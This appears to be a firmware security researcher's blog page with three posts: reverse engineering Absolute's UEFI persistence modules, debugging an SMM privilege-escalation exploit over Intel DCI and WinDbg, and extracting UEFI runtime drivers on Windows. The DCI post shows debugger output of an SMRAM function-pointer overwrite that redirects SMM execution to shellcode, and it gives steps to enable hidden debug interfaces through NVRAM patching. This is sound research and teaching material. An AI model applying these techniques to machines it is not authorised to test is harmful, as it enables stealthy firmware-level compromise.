Monday, April 12, 2021

Reverse engineering (Absolute) UEFI modules for beginners

This post introduces how one can start reverse engineering UEFI-based BIOS modules. Taking Absolute as an example, this post serves as a tutorial of BIOS module reverse engineering with free tools and approachable steps for beginners.

This post is not to explain how to disable or discover issues in Absolute.

In this post, terms "BIOS", "UEFI" and "firmware" all refer to UEFI-based host firmware and are  interchangeable. 

Background Story

You can skip this section. 

Last week, I got a Dell laptop with activated Absolute.

Absolute, formally known as Computrace, is popular data and device security software with an interesting persistent technology as explained in Wikipedia.

Absolute's flagship product is the Absolute Platform, formerly known as Data and Device Security (DDS). Absolute relies on patented Persistence technology, which is embedded into the firmware of most computers, tablets, and smartphones at the factory.[25]

The Persistence module is activated once the Absolute agent is installed. If the software client is removed from a device through flashing the firmware, replacing the hard drive, reimaging the device, or resetting the device back to factory settings, Persistence technology will trigger an automatic reinstallation of the software client.[25] Persistence technology is embedded in more than half a billion devices worldwide.

I read multiple articles about its internals in the past but did not know much about the modules embedded in the firmware. Out of curiosity, I started to reverse engineer it, then decided to write up the steps I took because I believed this area needed more engineers' scrutiny and tutorials for it.

Getting a BIOS image

There are two easy ways to get a BIOS image to analyze: extracting from an update package or using CHIPSEC.

BIOS images may be extracted from BIOS update packages OEMs publish. For example, any recent Dell's BIOS images can be extracted with a script in found in @platomaniac's BIOSUtilities repo.

As a handy sample, here is the Dell BIOS image we will analyze in this post.

Alternatively, with CHIPSEC, one can dump the BIOS image of the current system with this command after installation if the system is supported.

$ python chipsec_util.py spi dump rom.bin

Identifying Absolute's module

UEFI modules are normally OS-agnostics. It is, however, not the case for the modules that need to interact with OS environment to establish OS-level persistency, for example. We can find out such peculiar modules by searching OS-specific strings such as "System32" and "NtOpen." Let us do this.

Open the the extracted image with UEFITool and search "System32". This will list 821ACA26-29EA-4993-839F-597FC021708D. 

Note that UEFI modules are identified by GUIDs and not human-friendly names. Names may be specified but are optional and unused by the platform software. Take 821ACA26-29EA-4993-839F-597FC021708D as an example, it is unnamed in our image, but in other image, it is named as "efiinstnats". The internet also suggests it may be named as "AbsoluteAbtInstaller". 

Reverse Engineering a UEFI module

As the UEFITools shows, UEFI modules are vastly in the PF format and can be analyzed with existing tools. 

To reserves engineer 821ACA26-29EA-4993-839F-597FC021708D, on UEFITool, right click the file and extract its body. Then, install Ghidra and the efiSeek plugin as a free option. The other popular option is IDA and efiXplorer, though the free version of IDA is not usable for our scenario. 

Open the extracted file (821ACA26-29EA-4993-839F-597FC021708D) with Ghidra and make sure efiSeek is checked for auto analysis. Ignore a warning about PDB if it appears.


Strings contained in the module is VERY interesting.

What on earth a UEFI module has to do with SystemRoot. Either way, the string “Computrace” indicates this is Absolute’s component.

By peeking at functions called from the entry point, we can find an interesting function calling InstallAcpiTable()

As we can read from the API name it installs… an ACPI table, but what is it? With little bit of clean up, we can find some string literal looking values are assigned to the table variable, in particular, WPBT at the offset 0 looks interesting. 

With some google, we can find the Microsoft’s document explaining the table: Windows Platform Binary Table (WPBT) (DOCX)

In short, this type of ACPI table lets a UEFI module instruct Windows’ Session Manager to launch a specified executable on startup. We can see the use of the table in the code.

Let us just verify what is being registered. The handoff memory appears to be initialized with the data at 0x80013178, which are coming from 0x80001138 containing the MZ header.

 

From here, you could investigate smss.exe to see how the program is executed and wpbbin.exe to see the contents of the program. In this post, we are going to further look into BIOS, however.

Tracking inter-module dependencies

We have understood how the module installs auto startup mechanism for Windows, but how 821ACA26-29EA-4993-839F-597FC021708D gets executed? The file is an “Application” that is not automatically loaded the platform software. 

The short answer: another module starts it. 

Finding the parent module requires UEFI specific knowledge that starting an application in the firmware image is done with those steps. 

  1. Locating the application file via GUID through EFI_LOADED_IMAGE_PROTOCOL
  2. Calling LoadImage() and StartImage()

EDK2's UEFI Driver Writer's Guide shows example code that looks about like this:

MEDIA_FW_VOL_FILEPATH_DEVICE_PATH devicePath;
devicePath.Header = /* ... */
devicePath.FvFileName = FileGuid;   // GUID of the file to launch
// Open the loaded image protocol
gBS->OpenProtocol(..., &EFI_LOADED_IMAGE_PROTOCOL_GUID, &devicePathInterface, ...);
// Resolve the path in the firmware volume
path = AppendDevicePathNode(devicePathInterface, &devicePath.Header);
// Start the file
gBS->LoadImage(..., path, ..., &NewImageHandle);
gBS->StartImage(NewImageHandle, ...);

With this knowledge, we can search the GUID of the application (821ACA26-29EA-4993-839F-597FC021708D) and locate the parent module. 

As show above, the module 8B778A74-C275-49D5-93ED-4D709A129CB1 is found and is a DXE driver, meaning it is executed automatically by the platform software. Note that this module does not have the name in our image but other images had it as AbtDxe and DellAbtDxeBin.

Open the image with Ghidra and search the GUID through memory search. We can find the GUID at 0x800050e0 as shown below.


By cross-referencing 0x800050e0, we can find the function using the GUID and calling StartImage().

As we inspect the FUN_80002fe8 called above, it becomes obvious that the function calls LoadImage() with the GUID as input, and then, StartImage() is called, which launches the application.

When are those functions called? By cross referencing the function, we can find that the pointer of the function is passed to the CreateEventEx() with EFI_EVENT_READY_TO_BOOT_GUID. 


We can make better sense of this with the UEFI specification (PDF).

As highlighted, the function is set as a callback for the event that is called right before the OS boot loader starts. 

To summarize the flow:

  1. The driver 8B778A74-C275-49D5-93ED-4D709A129CB1 is loaded by the platform software.
  2. The driver 8B778A74-C275-49D5-93ED-4D709A129CB1 registers the event notification.
  3. When the system is about to start the boot loader (eg, bootmgfw.efi and grub.efi), the event is signaled.
  4. The driver 8B778A74-C275-49D5-93ED-4D709A129CB1 starts the application 821ACA26-29EA-4993-839F-597FC021708D.
  5. The application 821ACA26-29EA-4993-839F-597FC021708D installs the WPBT ACPI table.
  6. If Windows is booted, smss.exe creates wpbbin.exe from the table and executes it.
This establishes the mechanism to auto start a Windows application, even if Windows is reinstalled.

More inter-module interactions

An astute reader might notice we have not looked into how the above flow can be activated, or skipped in case Absolute is not enabled by the user. Answering to this question requires further analysis of UEFI variables and additional OEM-specific modules.

On the UEFI variables, Absolute uses few named as Abt* in the a0b1889e-00eb-445b-8ca9-e91ce43c907d namespace. They can be found as Unicode strings easily.  

On the additional modules, the below snippet indicates that the condition to launch the applications is either:

  • LocateProtocol() failed, or
  • LocateProtocol() succeeded and the bit 0 of the retrieved data is set  

The first case does not appear to happen. The second case depends on whether another module that installed the “unknownProtocol_fa02fb02” protocol sets the bit on their side. Meaning that we would have to reverse engineer the other module to determine the exact condition.

One can find the additional module by searching the protocol GUID on UEFITool again. Those are modules I found on my laptops:

  • 0FEBE434-A6AF-4166-BC2F-DE2C5952C87D (DellAbsoluteDxe) in Dell laptops
  • A81DD68E-F878-49FF-8309-798444A9C035 (AbtSmm) in an Acer laptop
  • 458034FD-DE82-44F1-8398-6D941F85F473 and 22E6FAB5-A6C4-4FF6-AE8C-C16939911BCD in a HP laptop

Analysis of the UEFI variable and OEM-specific modules is left as an exercise for readers, as they differ across OEMs.  

Conclusion

Through this exercise, we studied:

  • How a BIOS image file can be extracted
  • How modules with tight dependency on Windows can be located 
  • How the WBPT ACPI table may be used to establish persistency on Windows
  • How events can be used for differed execution
  • How dependent modules may be located in the BIOS image
  • Using only freely available, cross-platform software  

Hopefully, you found reverse engineering BIOS images was interesting and more approachable than previously you thought.  

Monday, March 29, 2021

Debugging System with DCI and Windbg

This post introduces how one can debug the entire system including system management mode (SMM) code with Windbg and Direct Connect Interface (DCI). As an example use case, we will debug the exploit of the kernel-to-SMM local privilege escalation vulnerability I reported.

For more details about the vulnerability and its implications, please refer to the GitHub repository. This post focuses on DCI and Windbg.

Summary

DCI is a stealthy, accessible and very powerful technology for kernel/firmware debugging and reverse engineering, and Intel Debug Extensions for WinDbg lets us use it through Windbg's already-familiar commands and GUI. This can speed up your security research.

What is Direct Connect Interface?

Direct Connect Interface (DCI) is the Intel hardware provided debugging interface. It allows developers to debug the whole system without depending on a software provided debugging mechanism, such as Windows' kernel debugging subsystem and firmware (EDK2)'s Debug Agent. 

As DCI is implemented by hardware, the debugger using this interface is capable of debugging a greater range of code including the reset vector and one that runs on the system management mode (SMM). This makes DCI an attractive tool for both developing and reverse engineering firmware, for example. 

For a more comprehensive overview of the DCI technology, I strongly recommend taking time to watch the video from Intel and reading a document by the Slim Bootloader team: 

Does my system support DCI?  

DCI is available on Skylake (6th gen) or later and some of Atom and Xeon models. However, older generations support only a connection type called DCI OOB and require an expensive adapter, as shown in the below table. 

If your target system is 7th gen or newer, DCI DbC is supported, and all you need to buy is a USB cable without the VBus. Buy ITPDCIAMAM1M or DataPro's one if the target system has the type-A USB port, or ITPDCIAMCM1M for the type-C USB port. I suggest buying both since I had a device that only worked with the type-C port. 

If your target system is 6th gen, DbC is not supported, and you need to buy an expensive adapter called CCA (EXIBSSBADAPTOR). It is expensive but allows you to debug code even from the reset vector, which is not supported by DbC.

DCI connection types
(from Debugging Intel Firmware using DCI & USB 3.0 by Intel)

There is no notable requirement for the host system, and one can use a USB-C-to-A adapter if needed.

The complete list of supported models can be found in the release notes of Intel System Debugger, which we will be looking at shortly. 

Is DCI enabled on the target?

If IA32_DEBUG_INTERFACE[0] is set, DCI is enabled. Use a kernel debugger or RWEverything to check this. For obvious reasons, DCI should be disabled by default on systems in the market. If not, report it to the OEM. It is a vulnerability (see CVE-2018-3652). 

How can I enable DCI? 

There is a couple of ways to do this: changing BIOS settings or patching NVRAM with RU.efi

BIOS settings 

Very occasionally, BIOS settings offer an option to enable DCI. I have seen a couple of configuration names for this purpose as listed below. Enable them if available. 

  • CPU Run Control
  • Enable HDCIEN
I had a case where the configuration was available but had no effect on IA32_DEBUG_INTERFACE. 

Patching NVRAM with RU.efi

The BIOS settings for DCI is often hidden in the production systems, but one can make the same effect as changing the settings by overwriting NVRAM storing the setting values. This is a bit involved process but explained in multiple articles as listed below. Here are the highlights of the steps.

  1. Extract BIOS using software like Chipsec
  2. Extract a module 899407D7-99FE-43D8-9A21-79EC328CAC21 ("Setup") with UEFITool
  3. Extract human readable representation of BISO menu implementation with IFR Extractor
  4. Find offsets of the following setting names and the value to set, as denoted with =>
    • Debug Interface => Enabled (1)
    • Debug Interface Lock => Disabled (0)
    • DCI enable (HDCIEN) => Enabled (1)
    • Platform Debug Consent => Enabled (DCI OOB+[DbC]) (1)
    • CPU Run Control => Enabled (1)
    • CPU Run Control Lock => Disabled (0)
    • PCH Trace Hub Enable Mode => Host Debugger (2)
      (Not all of them are found. It depends on BIOS) 
  1. Download RU.efi, boot the system into UEFI shell and start RU.efi
  2. Alt+=, select "Setup", and change the found offset values. Commit changes and reboot.

References

Note that some articles instruct you to change the following, but I did not have to do so. I do not think those are relevant.
  • Enable/Disable IED (Intel Enhanced Debug)
  • xDCI Support
Some device did not have the Setup module, some had but did not reflect changes into IA32_DEBUG_INTERFACE, and some did change IA32_DEBUG_INTERFACE but did not let me to connect anyway. I gave up on those cases. 

For completeness, Intel Flash Image Tool (FIT) is another tool that can patch firmware and enable DCI. While I have never tried it yet, I heard recommendations of this tool from multiple sources.

How can I connect the target via DCI? 

Intel System Debugger needs to be installed in the host for connection. Intel System Debugger comes as part of Intel System Studio (ISS), which can be downloaded from this link.

Select "Get the Full System Studio Package" then download the "Standalone Offline Installer".
 
Beware of that Intel has transitioned from ISS to a different product set and rebranded System Debugger as Intel System Bring-up Toolkit, which requires NDA to download. The above download link is still alive as of this writing but maybe shutdown in the future. 

On installation, make sure to install Intel System Debugger at least. Once you install ISS, here are some pages you can refer to for connecting to the target via ISS:

I recommend a legacy version of it for simplicity. It can be launched with 

C:\Program Files (x86)\IntelSWTools\sw_dev_tools\system_debugger_2020\system_debug_legacy\xdb.bat

Tips for diagnosing connection issues

  • Intel System Debugger Target Indicator is helpful to identify the possible cause. Make use of it
 
  • Not all ports work. For example, one of my devices could be debugged only via the type-C port. Try different ports. Sometimes reboot and simply yanking and reconnecting the cable fixes an issue.

Intel Debug Extensions for WinDbg

The installer should have installed the extension that lets you debug the target with Windbg through DCI. To use the extension, the extended debug interface (EXDI) IPC COM server needs to be registered on the host with the following commands: 

----
> cd "C:\Program Files (x86)\IntelSWTools\sw_dev_tools\system_debugger_2020\windbg-ext\iajtagserver\intel64"
> regsvr32 ExdiIpc.dll
----

Then, reboot the host system. 

Start the Intel System Debugger Developer Shell from the start menu and type "windbg_dci"

Once the connection is successfully established, type "windbg()" 

Windbg should start, show disassembly and register values, and accept most of the commands like .reload if successful. 


While the extension does work with Windows specific bits as if it were the standard kernel debugging session, it does not depend on the kernel debugging mechanism as indicated by some Kd flags. If you are looking for a stealthy kernel debugging tool, DCI is for you.

Debugging the system

Debugging the Windows kernel via DCI is functional but pointless unless using the kernel debugging is impossible. Instead, let us debug the SMM vulnerability exploit as an example use of the extension.

The SMM vulnerability and exploit

The vulnerability is that SMI 0x40 allows arbitrary SMRAM to be overwritten with 0x07. The exploit uses this primitive to overwrite a function pointer in the global variable referred to as SMST to achieve arbitrary code execution in SMM. 

The beautiful thing about SMST is that its address is leaked outside SMRAM by design. Ring0 code can search SMM core private data, which has the distinctive 'smmc' signature, from the UEFI runtime code region, then find the leaked pointer in it.

Address of SMST is leaked outside SMRAM

The exploit takes advantage of this and locates the address of the function pointer in SMRAM without depending on BIOS and system versions. For more details of the vulnerability and exploit, see the GitHub repository

Debugging SMM and Shellcode with Windbg

When the exploit is executed on a patched system, it debug-prints the range of SMRAM, addresses of SMM core and SMST, but fails to run the shell code.

Let us debug the exploit and simulate successful exploitation with help of Windbg. We will:
  1. load symbols for the "dt" command, then
  2. break on SMM entry,
  3. extract and analyze SMRAM,
  4. set a breakpoint on the SMI 0x40 handler,
  5. debug and modify execution to simulate successful exploitation

First, break into the Windbg and set a breakpoint to one of NT APIs the exploit calls.

----
0: kd> bp nt!ExGetSystemFirmwareTable
0: kd> g
----

Then, rerun the exploit on the target system. Reload the symbol of the exploit once the target breaks into Windbg. 

----
0: kd> .reload demo.sys
...
ModLoad: fffff806`4d860000 fffff806`4d869000 \??\C:\Users\tanda\Desktop\demo.sys
Loading symbols for fffff806`4d860000 demo.sys -> demo.sys

0: kd> dt demo!SMM_CORE_PRIVATE_DATA
   +0x000 Signature : Uint8B
   ...
----

On another windbg_dci session, enable the SMM entry break and resume the system. The system will break into the debugger again.

----
    [SKL_C0_T0] Hardware Breakpoint Execution breakpoint #0001 at [0x10:fffff8064f795b00]
    [SKL_C0_T1] HLT Instruction Break at [0x38:000000000009e1e5]
    [SKL_C1_T0] HLT Instruction Break at [0x38:000000000009e1e5]
    [SKL_C1_T1] HLT Instruction Break at [0x38:000000000009e1e5]
>>> itp.cv.smmentrybreak = 1
>>> go()
CPUs Resuming execution

>>>
    [SKL_C0_T0] Resuming
    [SKL_C0_T1] Resuming
    [SKL_C1_T0] Resuming
    [SKL_C1_T1] Resuming
>>>
    [SKL_C0_T0] SMM entry Break at [0xcb00:0000000000008000]
    [SKL_C0_T1] SMM entry Break at [0xcb80:0000000000008000]
    [SKL_C1_T0] SMM entry Break at [0xcc00:0000000000008000]
    [SKL_C1_T1] SMM entry Break at [0xcc80:0000000000008000]
>>>
----

On the Windbg session, confirm that this is SMI 0x40 by checking RIP being 0x8000 and AL being 0x40. Then, dump the contents of SMRAM according to the range debug-printed by the previous run. 

----
Break instruction exception - code 80000003 (first chance)
cb00:00000000`00008000 bb9180662e      mov     ebx,2E668091h

0: kd> r
rax=0000000000000040 rbx=0000000000000000 rcx=ffff808cca4df080
rdx=00000000000000b2 rsi=ffff808cd5aff000 rdi=ffff808cd746b7d0
rip=0000000000008000 rsp=000000002c127668 rbp=0000000000000000
 r8=0000000000098367  r9=0000000000000004 r10=00000000ffffffff
r11=ffff808cd74f6040 r12=ffffffff80001998 r13=0000000000000002
r14=fffff8064d7f52f8 r15=ffff808cd5aff000
...

0: kd> .writemem C:\temp\smram_88400000_88800000.bin 0`88400000 0`88800000-1
Writing 400000 bytes.........(snip)...
----

Download and run the SMRAM forensic script authored by Dmytro Oleksiuk (aka Cr4sh, @d_olex). This will show the address of the SMI 0x40 handler.

----
$ wget https://raw.githubusercontent.com/tandasat/smram_parse/master/smram_parse.py
$ python3 smram_parse.py smram_88400000_88800000.bin
...
SW SMI HANDLERS:
...
0x88700110: SMI = 0x40, addr = 0x886e5c68, image = 0x886e5000
...

----

On the Windbg session, confirm the address looks correct. You can also find that the function refers to outside the SMRAM as highlighted in red. Let us run the target until there.

----
0: kd> uf 0`886e5c68
00000000`886e5c68 4053             push rbx
00000000`886e5c6a 4883ec20         sub rsp,20h
00000000`886e5c6e 0fb704250e040000 movzx eax,word ptr [40Eh]
00000000`886e5c76 ba67000000       mov edx,67h
00000000`886e5c7b c605be12000001   mov byte ptr [00000000`886e6f40],1
00000000`886e5c82 c1e004           shl eax,4
00000000`886e5c85 0504010000       add eax,104h
00000000`886e5c8a 8b18             mov ebx,dword ptr [rax]

0: kd> g 0`886e5c8a

----

In the below disassembly, you can see that 0x104, outside the SMRAM, is referenced and contains the address to be overwritten minus 2 as colored in red. You can also find that subsequent code overwrites contents of the address as indicated by green. The address to be overwritten is highlighted in yellow.

----
0038:00000000`886e5c8a 8b18        mov ebx,dword ptr [rax] ds:0018:00000000`00000104=887f97fe
0038:00000000`886e5c8c 488bcb      mov rcx,rbx
0038:00000000`886e5c8f e8bc0d0000  call 00000000`886e6a50
...
0038:00000000`886e5c9e c6430207    mov byte ptr [rbx+2],7 ds:0018:00000000`887f9800=8c
0038:00000000`886e5ca2 eb10        jmp 00000000`886e5cb4

----

How does the exploit compute this address? Remember that the exploit was able to find the SMM core private data at 0x87f21390. Let us "dt" the address to confirm that the SMM private core data is indeed present in the address, as well as the leaked address of SMST highlighted in yellow.

----
0: kd> db 0`87f21390 l10
00000000`87f21390 73 6d 6d 63 00 00 00 00-18 67 4f 84 00 00 00 00 smmc.....gO.....

0: kd> dt demo!SMM_CORE_PRIVATE_DATA 0`87f21390
   +0x000 Signature : 0x636d6d73
   +0x008 SmmIplImageHandle : 0x00000000`844f6718 Void
   +0x010 SmramRangeCount : 3
   +0x018 SmramRanges : 0x00000000`844f2d18 Void
   +0x020 SmmEntryPoint : 0x00000000`887f9d7c Void
   +0x028 SmmEntryPointRegistered : 0x1 ''
   +0x029 InSmm : 0x1 ''
   +0x030 Smst : 0x00000000`887f9730 EFI_SMM_SYSTEM_TABLE2
   +0x038 CommunicationBuffer : (null) 
   +0x040 BufferSize : 0x20
   +0x048 ReturnStatus : 0
   +0x050 PiSmmCoreImageBase : _LARGE_INTEGER 0x1
   +0x058 PiSmmCoreImageSize : 0xfffff806`53427320
   +0x060 PiSmmCoreEntryPoint : _LARGE_INTEGER 0xfffff806`53427980
----

The exploit adds 0xd0 to the address of SMST since its layout is known. As shown below, the offset 0xd0 is the function pointer SmmLocateProtocol.

----
0: kd> db 0`887f9730 l10
00000000`887f9730 53 4d 53 54 00 00 00 00-1e 00 01 00 18 00 00 00 SMST............

0: kd> dt demo!EFI_SMM_SYSTEM_TABLE2 0`887f9730
   +0x000 Hdr : EFI_TABLE_HEADER
   +0x018 SmmFirmwareVendor : (null) 
   +0x020 SmmFirmwareRevision : 0
   +0x028 SmmInstallConfigurationTable : 0x00000000`887fa1b0 Void
   +0x030 SmmIo : EFI_SMM_CPU_IO2_PROTOCOL
   +0x050 SmmAllocatePool : 0x00000000`887fb61c Void
   +0x058 SmmFreePool : 0x00000000`887fb744 Void
   +0x060 SmmAllocatePages : 0x00000000`887fbd20 Void
   +0x068 SmmFreePages : 0x00000000`887fbe30 Void
   +0x070 SmmStartupThisAp : 0x00000000`887e0af0 Void
   +0x078 CurrentlyExecutingCpu : 0
   +0x080 NumberOfCpus : 4
   +0x088 CpuSaveStateSize : 0x00000000`887ddd50 -> 0x400
   +0x090 CpuSaveState : 0x00000000`887ddf50 -> 0x00000000`887dac00 Void
   +0x098 NumberOfTableEntries : 6
   +0x0a0 SmmConfigurationTable : 0x00000000`887e5810 Void
   +0x0a8 SmmInstallProtocolInterface : 0x00000000`887fb928 Void
   +0x0b0 SmmUninstallProtocolInterface : 0x00000000`887fbaf4 Void
   +0x0b8 SmmHandleProtocol : 0x00000000`887fbc1c Void
   +0x0c0 SmmRegisterProtocolNotify : 0x00000000`887fbf2c Void
   +0x0c8 SmmLocateHandle : 0x00000000`887fa058 Void
   +0x0d0 SmmLocateProtocol : 0x00000000`887f9f8c Void
   +0x0d8 SmiManage : 0x00000000`887fb2fc Void
   +0x0e0 SmiHandlerRegister : 0x00000000`887fb3d4 Void
   +0x0e8 SmiHandlerUnRegister : 0x00000000`887fb48c Void

----

So, the SMI 0x40 would have been about to overwrite the contents of the SmmLocateProtorol field.

Since the code we are debugging is no longer vulnerable, let us emulate successful exploitation by changing the RIP to the MOV instruction. After stepping through the instruction, we can confirm the contents of the address highlighted in yellow was changed to 0x07.

----
0: kd> dp 0`887f9800 l1
00000000`887f9800 00000000`887f9f8c

0: kd> r rip=0`886e5c9e 
0: kd> t


0: kd> dp 0`887f9800 l1
00000000`887f9800 00000000`887f9f07

----

After repeating this step 4 times, the address is overwritten to 0x07070707, outside the SMRAM.

----
0: kd> dp 0`887f9800 l1
00000000`887f9800 00000000`07070707


0: kd> dt demo!EFI_SMM_SYSTEM_TABLE2 0`887f9730
...

   +0x0c8 SmmLocateHandle : 0x00000000`887fa058 Void
   +0x0d0 SmmLocateProtocol : 0x00000000`07070707 Void
   +0x0d8 SmiManage : 0x00000000`887fb2fc Void
...
----

Let us run the target one more time to verify successful exploitation. The next SMI is 0xdf, which will call SmmLocateProtocol.

----
0: kd> g
Break instruction exception - code 80000003 (first chance)
cb00:00000000`00008000 bb9180662e mov ebx,2E668091h

0: kd> r
rax=00000000000000df rbx=0000000000000000 rcx=fffff8064d544180
rdx=ffffed842b8400b2 rsi=ffff808cd68ff000 rdi=ffff808cd521e7c0
rip=0000000000008000 rsp=000000002b8476e0 rbp=0000000000000000
r8=0000000000000001 r9=ffff808cd7345040 r10=6c6c656873204d4d
r11=ffff808ccc4901e8 r12=ffffffff80002b6c r13=0000000000000002
r14=fffff8064d8652f8 r15=ffff808cd68ff000
...


0: kd> uf 07070707
00000000`07070707 90              nop
00000000`07070708 90              nop
00000000`07070709 90              nop
00000000`0707070a 90              nop
00000000`0707070b 90              nop
00000000`0707070c 90              nop
00000000`0707070d 90              nop
00000000`0707070e 90              nop
00000000`0707070f 90              nop
00000000`07070710 4c89442418      mov     qword ptr [rsp+18h],r8
00000000`07070715 4889542410      mov     qword ptr [rsp+10h],rdx
00000000`0707071a 48894c2408      mov     qword ptr [rsp+8],rcx
00000000`0707071f 4883ec28        sub     rsp,28h
00000000`07070723 48c744240800000000 mov   qword ptr [rsp+8],0
00000000`0707072c b99e000000      mov     ecx,9Eh
00000000`07070731 0f32            rdmsr

0: kd> bp 0`07070707 
0: kd> g
Breakpoint 0 hit
0038:00000000`07070707 90 nop
----

🎉 As expected, the target breaks into the debugger at 0x07070707. Once the shell code is executed, its output stored at 0x0 can be checked.

----
0: kd> dx *(demo!HOOKED_SMM_LOCATE_PROTOCOL_PARAMETER_BLOCK*)0
*(demo!HOOKED_SMM_LOCATE_PROTOCOL_PARAMETER_BLOCK*)0 [Type: HOOKED_SMM_LOCATE_PROTOCOL_PARAMETER_BLOCK]
    [+0x000] Untouched        : 0x1588748418 [Type: unsigned __int64]
    [+0x008] Smbase           : 0x887cb000 [Type: unsigned __int64]
    [+0x010] SmmFeatureControl : 0x1 [Type: unsigned __int64]
    [+0x018] SmmMcaCap        : 0xc00000000000000 [Type: unsigned __int64]
    [+0x020] Eptp             : 0x0 [Type: unsigned __int64]
    [+0x028] HvPatchedAddress : 0x0 [Type: unsigned __int64]
----

Hopefully, you find the combination of DCI and Windbg interesting.

Resources 

Tips for general debugging with DCI

  • Make the target system single core with bcdedit. I found debugging multi-core configuration is unusably unstable. 
  • Fully disable Hyper-V on the target before debugging. Hyper-V will crash the system with synthetic watchdog bugcheck, even if VBS is disabled. 
  • DCI offers break-on-VM-exit/entry but I could never make it work. Do not waste time but also let me know if it worked for you.

Tips and references for reverse engineering SMM with DCI

  • Neither Windbg nor Intel System Debugger correctly displays 16-bit mode code at the beginning of SMM. Just continue single stepping until around offset 0x90.

Others

Acknowledgement 

  • Researchers published their work around DCI/SMM, in particular, Dmytro Oleksiuk (@d_olex) and Mark Ermolov (@_markel___)

Thursday, December 24, 2020

Experiment in extracting runtime drivers on Windows

This post explains the concept of UEFI runtime drivers, how they interact with OS, and an experimental attempt to extract them.

Here is a quick takeaway from this article. 

  • UEFI runtime drivers are part of firmware that run with the ring-0 privilege before OS starts.
  • They provide interfaces to some firmware-dependent features, called runtime services, to OS. 
  • Windows saves the addresses of those runtime services into HalEfiRuntimeServicesBlock
  • The base addresses of runtime drivers can be located from the contents of  HalEfiRuntimeServicesBlock, but it is difficult to safely find HalEfiRuntimeServicesBlock and base addresses.
  • Dumping the runtime drivers are useful for diagnosing issues with them, but the HalEfiRuntimeServicesBlock-based approach is fundamentally limited to drivers that implement runtime services.
Happy holidays?


What are UEFI runtime drivers?

Any retail x86_64 PCs have UEFI-based system firmware those days, and such firmware must implement some modules that reside in memory from system start up to shutdown. Those modules are called UEFI "runtime drivers" and meant to provide interfaces to certain firmware-implemented services to an operating system (OS), as specified by the UEFI specification

For example, UEFI defines ResetSystem() as one of such interfaces and requires OEM to implement firmware containing the runtime driver that implements it. Taking my ASUS laptop as an example, ResetSystem() is implemented in a runtime driver called SBRun. 

Those interfaces are called "runtime services" and defined for 14 services.  One can find the C-representation of their definitions in EDK2.
///
/// EFI Runtime Services Table.
///
typedef struct {
  ///
  /// The table header for the EFI Runtime Services Table.
  ///
  EFI_TABLE_HEADER                Hdr;

  //
  // Time Services
  //
  EFI_GET_TIME                    GetTime;
  EFI_SET_TIME                    SetTime;
  EFI_GET_WAKEUP_TIME             GetWakeupTime;
  EFI_SET_WAKEUP_TIME             SetWakeupTime;

  //
  // Virtual Memory Services
  //
  EFI_SET_VIRTUAL_ADDRESS_MAP     SetVirtualAddressMap;
  EFI_CONVERT_POINTER             ConvertPointer;

  //
  // Variable Services
  //
  EFI_GET_VARIABLE                GetVariable;
  EFI_GET_NEXT_VARIABLE_NAME      GetNextVariableName;
  EFI_SET_VARIABLE                SetVariable;

  //
  // Miscellaneous Services
  //
  EFI_GET_NEXT_HIGH_MONO_COUNT    GetNextHighMonotonicCount;
  EFI_RESET_SYSTEM                ResetSystem;

  //
  // UEFI 2.0 Capsule Services
  //
  EFI_UPDATE_CAPSULE              UpdateCapsule;
  EFI_QUERY_CAPSULE_CAPABILITIES  QueryCapsuleCapabilities;

  //
  // Miscellaneous UEFI 2.0 Service
  //
  EFI_QUERY_VARIABLE_INFO         QueryVariableInfo;
EFI_RUNTIME_SERVICES;

Why we care? 

Runtime drivers have some interesting characteristics:
  • They start before the OS is loaded and can influence the boot process
  • They run with the ring-0 privilege
  • They are called during normal OS execution through the runtime services
  • They are not listed by any widely known monitoring tools or debuggers (unlike device drivers) on Windows
  • They can be developed by anyone and be loaded as long as Secure Boot is disabled
  • They may not exist as files in storage that is accessible from OS 
Because of the lack of visibility into them and access to files, diagnosing issues with them can be more challenging than the issues with OS-based kernel modules. For example, to reverse engineer runtime driver code, you first have to find the runtime drivers in memory and extract them to a file, instead of grabbing a file on the disk.

The other reason is that runtime drivers have gained popularity in a reverse engineering community and are used more and more widely in a way that breaks the standard OS/system integrity. For example, the owner of the system may install a 3rd party runtime driver that overrides the runtime services provided  by OEM firmware, to have a "backdoor" for reverse engineering. EfiGuard and efi-memory are examples of those. While that is the owner's very intention, some software may still want to detect this and be aware of the fact that system integrity might be tampered.  

How can we find runtime drivers on Windows?

There is no documented interface to locate any runtime drivers in the Windows kernel, unfortunately. However, there are few implementation details that can be abused for it, for example,
  • The addresses of some runtime services are stored in HalEfiRuntimeServicesBlock
  • There is an EFI_RUNTIME_SERVICES global variable, which contains pointers to the runtime services as seen above, has a distinctive RUNTSERV signature, and is memory resident
  • Runtime drivers are also memory resident, mapped in a certain contiguous physical and virtual memory range, and have the DOS header at 4KB aligned addresses
  • Physical memory addresses backing runtime drivers are outside the ranges of Windows manages
Based on those facts, one may scan the DOS header in physical or virtual memory and attempt to find all runtime drivers. 

The other limited (details later) but arguably easier and safer way is to refer to HalEfiRuntimeServicesBlock. HalEfiRuntimeServicesBlock is a Windows defined structure made up of copies of a handful of runtime service addresses [ref], as shown below. 

typedef struct _HAL_RUNTIME_SERVICES_BLOCK
{
    voidGetTime;
    voidSetTime;
    voidResetSystem;
    voidGetVariable;
    voidGetNextVariableName;
    voidSetVariable;
    voidUpdateCapsule;
    voidQueryCapsuleCapabilities;
    voidQueryVariableInfo;
HAL_RUNTIME_SERVICES_BLOCK;

Windows initializes this structure on its startup and uses it to invoke runtime services (as opposed to directly using the EFI_RUNTIME_SERVICES structure). By locating HalEfiRuntimeServicesBlock, one can find runtime services' addresses and runtime drivers implementing them. 

PoC and challenges 

I authored the tool implementing this idea, named kraft_dinner. Greater details can be found in source code, and here are some notable discoveries with this approach.
  • HalEfiRuntimeServicesBlock can be found with HalQuerySystemInformation() up until only 19H2. One has to get creative for newer versions.
  • The physical memory address range backing runtime drivers is not known to Windows and not reported by MmGetPhysicalMemoryRanges(). This can be used to test a probable runtime driver address. 
  • MmCopyMemory() never succeeds in reading memory that backs runtime drivers, regardless of whether virtual or physical memory is specified. This makes implementing a safe search operation harder.

Limitations

While the HalEfiRuntimeServicesBlock approach works reasonably well, it has some fundamental limitations.

Firstly, runtime drivers that do not implement runtime services are not found. Such runtime drivers do not have any formally defined way to directly influence Windows and system integrity, but may still hook (patch) other code to implement backdoor instead. umap and voyager are examples of such hacking drivers. A memory scanning-based approach would address this issue.  

